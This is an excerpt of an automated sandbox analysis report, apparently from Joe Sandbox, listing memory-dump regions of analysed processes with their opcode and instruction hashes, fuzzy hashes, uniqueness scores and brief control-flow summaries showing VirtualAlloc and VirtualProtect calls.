                                                                                                                                      • Instruction ID: 16c3ed72f3c4d39044c099b7ed734c8d44601ef8a3dfe3f04e9aba38f69960f5
                                                                                                                                      • Opcode Fuzzy Hash: 0c76cd19877da2514bb35b312c4e262fec0f6c52acd9a6cd371b07bc3308deb5
                                                                                                                                      • Instruction Fuzzy Hash: 9CF0A07091A28D9FDB51EF608A206ED77B0FF05300F4504E6E028C32A2DB389618D741
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b880000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 61140f1df491b8f547f654c528ba581d7a4351083913b5fd61ffa9837d6770a2
                                                                                                                                      • Instruction ID: f6792a6c1c1ff4b9c5bbebec4e860ac109e6f34f4d2ef430a2c38895b81b1c36
                                                                                                                                      • Opcode Fuzzy Hash: 61140f1df491b8f547f654c528ba581d7a4351083913b5fd61ffa9837d6770a2
                                                                                                                                      • Instruction Fuzzy Hash: 03F0DA74A1991A8BE7A8EB18CC646E867A1EF98344F0041B9901D935A5CE346E818B41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3a1d0e800955657eb0fe48ff41d0b92f8f9d4fb002e5497b84ae150b53283670
                                                                                                                                      • Instruction ID: 410e16134fad39718abc3046483744791044b2294416c8c5b8e6498beb12727e
                                                                                                                                      • Opcode Fuzzy Hash: 3a1d0e800955657eb0fe48ff41d0b92f8f9d4fb002e5497b84ae150b53283670
                                                                                                                                      • Instruction Fuzzy Hash: 7FF0FE70A0450D8FE714EF84C4647F877B1EB58329F14413EC415A72E5DB79A984CB14
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a68b4ddc9dfaa1bd11658119ad107a644a9d6ff2af0e9f2acbe00c6c664678db
                                                                                                                                      • Instruction ID: 4f8a02afc3d1353eaddceece3ed1075bf80d57abe01d0839c4d99feaf2155b08
                                                                                                                                      • Opcode Fuzzy Hash: a68b4ddc9dfaa1bd11658119ad107a644a9d6ff2af0e9f2acbe00c6c664678db
                                                                                                                                      • Instruction Fuzzy Hash: 0CF0F870A0411D8FEB55EF80C858BF973B2FB59320F10077AC409A72D5DB796684CB44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b886000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7fcb34bdd9a894c83ef5c10ad9576a671bbdb11f35becdd2cf3460e1dbe0b489
                                                                                                                                      • Instruction ID: 2a9cce8ef03432b02c27bed38e24ea2f9db93362f2a2681169a626367e4c1cc5
                                                                                                                                      • Opcode Fuzzy Hash: 7fcb34bdd9a894c83ef5c10ad9576a671bbdb11f35becdd2cf3460e1dbe0b489
                                                                                                                                      • Instruction Fuzzy Hash: B0F0D470D0A62D8FFBB4AB64C968BE9B6B0EF58300F1100F8C15DA2391DE395AC4CE01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8ea81d9a5c01908a963c0d3cfc0aa9380e4b7b9eb71e432e8b9c1dac4d177ba5
                                                                                                                                      • Instruction ID: e7d57d85804cb51903967511dec6c3be86c0f37f68b41fc99af3b2b2c40fd6eb
                                                                                                                                      • Opcode Fuzzy Hash: 8ea81d9a5c01908a963c0d3cfc0aa9380e4b7b9eb71e432e8b9c1dac4d177ba5
                                                                                                                                      • Instruction Fuzzy Hash: 3DE04F61A0461A8BFB58AF48C8915AD6FB1EF44200F400135C41D871D5DE342542C740
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000014.00000002.2807107018.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_20_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: %$($)$+
                                                                                                                                      • API String ID: 0-687716160
                                                                                                                                      • Opcode ID: 951e6e74a341abd72bba46a29dece6e0e0652021633df95f2e38f2a5eb425ace
                                                                                                                                      • Instruction ID: e8f7a8636b4bd24637bff69abf59f12d483bff6b92003487f846a2a6bb2f06c9
                                                                                                                                      • Opcode Fuzzy Hash: 951e6e74a341abd72bba46a29dece6e0e0652021633df95f2e38f2a5eb425ace
                                                                                                                                      • Instruction Fuzzy Hash: CE21F330E06A2D8FEBB9DF54C8947E9BBB5EB49301F1041E9C00DA2291DB746B888F44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:4%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:6
                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                      execution_graph 16098 7ffd9b8b1e1d 16099 7ffd9b8b1e81 VirtualAlloc 16098->16099 16101 7ffd9b8b1f55 16099->16101 16094 7ffd9b8b03fe 16095 7ffd9b8b040d VirtualProtect 16094->16095 16097 7ffd9b8b054d 16095->16097

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 2$H$zK_H
                                                                                                                                      • API String ID: 0-1931165123
                                                                                                                                      • Opcode ID: 86bc06eccc98955d8e2b045ba14131f3bb7e64c79c8cbf275d1a7cc1af189f83
                                                                                                                                      • Instruction ID: 9772f83052acb9dc39bbf523f5974061c5c016d77a675a1d8923f79bbfd0d3fc
                                                                                                                                      • Opcode Fuzzy Hash: 86bc06eccc98955d8e2b045ba14131f3bb7e64c79c8cbf275d1a7cc1af189f83
                                                                                                                                      • Instruction Fuzzy Hash: F3C2B870E1952D8FDBA8DB58C8A5BA9B7B5FF58300F5041E9D00DE72A5DE346A81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Em>N
                                                                                                                                      • API String ID: 0-488659082
                                                                                                                                      • Opcode ID: 23d4330de91fd3a45d36c3c867cd1de3934d92ee41fb84802cdbdc742cc96459
                                                                                                                                      • Instruction ID: 9e79e4f9e4525d6cd9e503f2c55db893ae88d9c81ad9e4f297619825068c2e3d
                                                                                                                                      • Opcode Fuzzy Hash: 23d4330de91fd3a45d36c3c867cd1de3934d92ee41fb84802cdbdc742cc96459
                                                                                                                                      • Instruction Fuzzy Hash: 84221470E0461D8FDB59DFA8C895AEDBBB2FF48300F148269D419EB259DB34A981CF50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d46e82dbdbf498dd38c827f49ac2de2d755d873ef31bb8d3cd29ab430da731be
                                                                                                                                      • Instruction ID: 1c7a61f25bbd86f6ac8933299580862a1a5097171d44ef5a98b16534294c3f61
                                                                                                                                      • Opcode Fuzzy Hash: d46e82dbdbf498dd38c827f49ac2de2d755d873ef31bb8d3cd29ab430da731be
                                                                                                                                      • Instruction Fuzzy Hash: C7A1B071A19A4D8FE7A8DBACC8647A97FE1FB69304F4001BAD04ED72D6DB782801C741
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 343 7ffd9b8b03fe-7ffd9b8b040b 344 7ffd9b8b0416-7ffd9b8b0427 343->344 345 7ffd9b8b040d-7ffd9b8b0415 343->345 346 7ffd9b8b0429-7ffd9b8b0431 344->346 347 7ffd9b8b0432-7ffd9b8b054b VirtualProtect 344->347 345->344 346->347 352 7ffd9b8b054d 347->352 353 7ffd9b8b0553-7ffd9b8b05a3 347->353 352->353
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8AF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AF000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8af000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                      • Opcode ID: 6007fb995177caa73088203b4dd7bc26afb8690d80304a8bbdd7d545aad02fbc
                                                                                                                                      • Instruction ID: 59d8b0098983a335f076d07e55c0766ff7146b99c541e695054566fec34c6f0c
                                                                                                                                      • Opcode Fuzzy Hash: 6007fb995177caa73088203b4dd7bc26afb8690d80304a8bbdd7d545aad02fbc
                                                                                                                                      • Instruction Fuzzy Hash: 64517E70D0864D8FDF59DFA8C845AEDBBF0FB5A310F1042AAD448E3252DB74A885CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 356 7ffd9b8b1e1d-7ffd9b8b1f53 VirtualAlloc 360 7ffd9b8b1f55 356->360 361 7ffd9b8b1f5b-7ffd9b8b1fbf 356->361 360->361
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8AF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AF000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8af000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: ed98166128f5a24a881d22030e5b99212c35924a2e76416ce0ee64d93ebc9393
                                                                                                                                      • Instruction ID: 46b768f7857330fedc581e5da39988cb075859c776401e4c3b2231b41df0add4
                                                                                                                                      • Opcode Fuzzy Hash: ed98166128f5a24a881d22030e5b99212c35924a2e76416ce0ee64d93ebc9393
                                                                                                                                      • Instruction Fuzzy Hash: D1512A70908A5D8FDF94EF68C845BE9BBF1FB69310F1041AAD00DE3255DB70A9858F80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 364 7ffd9b8b4a02-7ffd9b8b4a35 366 7ffd9b8b4a3f-7ffd9b8b4a78 364->366 368 7ffd9b8b4a86-7ffd9b8b4a8d 366->368 369 7ffd9b8b4a7a-7ffd9b8b4a84 366->369 370 7ffd9b8b4a8f-7ffd9b8b4c74 368->370 371 7ffd9b8b4aad-7ffd9b8b4f8c 368->371 369->368 370->368 377 7ffd9b8b4c7a-7ffd9b8b4c84 370->377 371->368 378 7ffd9b8b4f92-7ffd9b8b4f9c 371->378 377->368 378->368
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +
                                                                                                                                      • API String ID: 0-2126386893
                                                                                                                                      • Opcode ID: b0281616520bee2015c5904817ddefc345dd9b3ac6bd7f281e9b2878082d7018
                                                                                                                                      • Instruction ID: 463265bef545a88bf77cddef2ea64d584024d54c16f0ba8798bf0a29c017e042
                                                                                                                                      • Opcode Fuzzy Hash: b0281616520bee2015c5904817ddefc345dd9b3ac6bd7f281e9b2878082d7018
                                                                                                                                      • Instruction Fuzzy Hash: 1E31E570A0962D8FEBB4DB58C8A47A9B7B4FB59300F1041E9D04DD2292DB786BC48F45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 379 7ffd9b8b4ab9-7ffd9b8b4ac2 381 7ffd9b8b4acd-7ffd9b8b4b0c 379->381 383 7ffd9b8b4a86-7ffd9b8b4a8d 381->383 384 7ffd9b8b4b12-7ffd9b8b4b1c 381->384 385 7ffd9b8b4a8f-7ffd9b8b4c74 383->385 386 7ffd9b8b4aad-7ffd9b8b4f8c 383->386 384->383 385->383 392 7ffd9b8b4c7a-7ffd9b8b4c84 385->392 386->383 393 7ffd9b8b4f92-7ffd9b8b4f9c 386->393 392->383 393->383
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +
                                                                                                                                      • API String ID: 0-2126386893
                                                                                                                                      • Opcode ID: 429ebe299b94fe5fc71c228feadaf02649acd968b522e98d70030d69bbee4603
                                                                                                                                      • Instruction ID: 36acc9f0d5640625fb53bf26f467d94201ede013638172f1c73097f0ea23edb3
                                                                                                                                      • Opcode Fuzzy Hash: 429ebe299b94fe5fc71c228feadaf02649acd968b522e98d70030d69bbee4603
                                                                                                                                      • Instruction Fuzzy Hash: 4E011E30E4562E8EEBA4DF58C8987E8B7F0EB59341F1541FAD05CD2291DA741AC48F81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 69a8511577b9d4cd26e954e339f2634f26d7faa42db4327247089329e7969133
                                                                                                                                      • Instruction ID: e36460883cf96697efb63585423a2b0e3e978196f635f57c7cecc0b513c41d05
                                                                                                                                      • Opcode Fuzzy Hash: 69a8511577b9d4cd26e954e339f2634f26d7faa42db4327247089329e7969133
                                                                                                                                      • Instruction Fuzzy Hash: 0F42DE70A0991D8FDBA8DF58C894BA9B7B1FF98301F1141E9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9791ef2bd85afef40cfb23a8ed74bec42db7e4435be039b23964ea85e33b0181
                                                                                                                                      • Instruction ID: 10460cfee173e67142d38bf3114fcdfda86b82ce6848c97371e98b65b61e8cc2
                                                                                                                                      • Opcode Fuzzy Hash: 9791ef2bd85afef40cfb23a8ed74bec42db7e4435be039b23964ea85e33b0181
                                                                                                                                      • Instruction Fuzzy Hash: DAD14C71E1965D8FDB9CEB58D865BE8B7B2FF58300F4401B9D00DA72E6DA346981CB01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5572d4a7aa4f3eaeeb70052e3f068dfb934472e47cb11ea776ec8e228bf3c471
                                                                                                                                      • Instruction ID: 09810d65090abf2ccf91e373437d71cf8fab711f7f57fb5737a0f62f37d855ed
                                                                                                                                      • Opcode Fuzzy Hash: 5572d4a7aa4f3eaeeb70052e3f068dfb934472e47cb11ea776ec8e228bf3c471
                                                                                                                                      • Instruction Fuzzy Hash: 36E1DD70E0991D8FDBA8DF58C895AA9B7B1FF58300F1141E9D01DE72A5DA35AE81CF80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fbe5b3c40f092f4cdf54885dcb12b826e6d3ee4d38936373e501ed9b4c0ba5dc
                                                                                                                                      • Instruction ID: 7b890cc83d14f3c24d1c927095189ab773dac3e827f0494ffebb45579a3a8995
                                                                                                                                      • Opcode Fuzzy Hash: fbe5b3c40f092f4cdf54885dcb12b826e6d3ee4d38936373e501ed9b4c0ba5dc
                                                                                                                                      • Instruction Fuzzy Hash: 00C13B70E1A65DCFDB6CEBA8D8646BDB7B1FF19301F1501B9D409A32A2CB386941CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4e35934ab037f95491956fe55b20166436a26694a3ac1a8ea2b2a596e037d4aa
                                                                                                                                      • Instruction ID: dc203a309906543831a7887b2d249e21bc3eb8c050f3eb9b345a7bb8d2ccaa02
                                                                                                                                      • Opcode Fuzzy Hash: 4e35934ab037f95491956fe55b20166436a26694a3ac1a8ea2b2a596e037d4aa
                                                                                                                                      • Instruction Fuzzy Hash: 84D1DE70E0991D8FDBA8DF58C895AA9B7B1FF58300F1141E9D01DE72A5DA35AE81CF80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5a59d1e512ea826d681174ba97faa5fd8fb89184a512c7b26e1c750e75ae10c1
                                                                                                                                      • Instruction ID: 01cb142594a812944bc1bda3f6abfa1b1199c8bdd5f69e1501038a132983031d
                                                                                                                                      • Opcode Fuzzy Hash: 5a59d1e512ea826d681174ba97faa5fd8fb89184a512c7b26e1c750e75ae10c1
                                                                                                                                      • Instruction Fuzzy Hash: 80C1DD70E0991D8FDBA8DF58C895BA9B7B1FF58300F1141B9D00DE72A5DA35AA81CF80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f30676f6b3e91590f21a435c7acecba71729a510de9d8973564ac5e5e9fee989
                                                                                                                                      • Instruction ID: a73c5e2554ff922ee02125fa3e391d7efbbe34572aa8226cd2003d5212b96abf
                                                                                                                                      • Opcode Fuzzy Hash: f30676f6b3e91590f21a435c7acecba71729a510de9d8973564ac5e5e9fee989
                                                                                                                                      • Instruction Fuzzy Hash: 4CC1DD70A0991D8FDBA8DB58C895BA9B3B1FF98301F5141F9D00DD72A5DA35AE81CF80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0c3e4651120af85176e2788db5fbc8fedece54b7ee2c4bc2801a08d924dc9ca9
                                                                                                                                      • Instruction ID: 71583c43ec74e4f535e22d86e692e73d8255f1bfe90bf6b21e3ba3e6a5711393
                                                                                                                                      • Opcode Fuzzy Hash: 0c3e4651120af85176e2788db5fbc8fedece54b7ee2c4bc2801a08d924dc9ca9
                                                                                                                                      • Instruction Fuzzy Hash: 01C1CC70A0991D8FDBA8DF58C895BA9B3B1FF58305F1141E9D00DE72A5DA35AE81CF80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b165af0306b367a8168bc85345fd431deb916d1bc28d326fa2f729015517e658
                                                                                                                                      • Instruction ID: e7ea20babcd80ef10107116a608542220728b30f02a277cdee720afdf5369204
                                                                                                                                      • Opcode Fuzzy Hash: b165af0306b367a8168bc85345fd431deb916d1bc28d326fa2f729015517e658
                                                                                                                                      • Instruction Fuzzy Hash: 62C1DC70A0991D8FDBA8DF58C895BA9B3B1FF58305F1141E9D00DE72A5DA35AE81CF80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b253999c4db7fc11e5785e400ab9dcb34ffe610ffce398d5516499cbec900087
                                                                                                                                      • Instruction ID: f061dc2085a612971c3daa5ccac17972ee5d859aa4b8e990d99a19ffa9fa4172
                                                                                                                                      • Opcode Fuzzy Hash: b253999c4db7fc11e5785e400ab9dcb34ffe610ffce398d5516499cbec900087
                                                                                                                                      • Instruction Fuzzy Hash: 37C1DD70E0991D8FDBA8DF58C895BA9B7B1FF58301F1141E9D00DE72A5DA35AA81CF80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 151456ce1e90c512bd5d39b3e2dc2fbdb0ca334be6d9487208328c96e8c0d425
                                                                                                                                      • Instruction ID: 097c2cb5dcc1e1ccb886e0383353c6945b56af9f17b551aca86ec1e56266bbe2
